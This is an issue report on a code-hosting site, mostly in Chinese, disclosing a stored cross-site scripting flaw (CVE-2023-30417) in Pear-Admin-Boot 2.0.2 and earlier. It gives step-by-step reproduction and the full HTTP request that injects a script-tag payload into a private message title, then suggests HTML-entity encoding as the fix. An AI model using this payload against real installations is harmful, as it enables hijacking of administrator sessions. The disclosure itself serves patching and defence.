Headline
CVE-2023-30417: pear-admin-boot存在存储式跨站脚本漏洞 · Issue #I6SXHX · Pear Admin/Pear Admin Boot - Gitee.com
A cross-site scripting (XSS) vulnerability in Pear-Admin-Boot up to v2.0.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title of a private message.
漏洞类型
存储式跨站脚本
受影响实体版本号
pear-admin-boot <= 2.0.2
漏洞验证
前置条件:具有私信权限的用户登录
步骤:
1.运行pear-admin-boot = 2.0.2环境
2.管理员新建一个具有私信权限的用户
3.具有私信权限的用户登录
4.发送一条私信给“管理”用户,标题带有payload:123<script>alert(1)</script>456
完整请求报文:
POST /system/notice/save HTTP/1.1
Accept: application/json, text/javascript, /; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,en-US;q=0.7,en;q=0.6
Connection: keep-alive
Content-Length: 141
Content-Type: application/json
Cookie: rememberme-token=M1lPJTJCTFpzMDdWQjcxVXFtRXVUQWNRJTNEJTNEOkFWRUNDbDlqWFVTOFIlMkZCVjFrN2xCdyUzRCUzRA; JSESSIONID=E032828B9FC2AA972BBAABEE11EC4456
Host: 127.0.0.1:8080
Origin: http://127.0.0.1:8080
Referer: http://127.0.0.1:8080/system/notice/add
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", “Chromium";v="111”
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: “Windows”
{"title":"123<script>alert(1)</script>456","content":"123456","sender":"1642713637653180417","accept":"1309861917694623744","type":"private"}
5.使用管理员账号登录,登录时会触发XSS
修复建议
我提交了一个Pull Request,在SysNoticeServiceImpl.java的selectSysNoticeList方法中向页面输出响应前,对title和content进行了html实体编码,应该能解决这个漏洞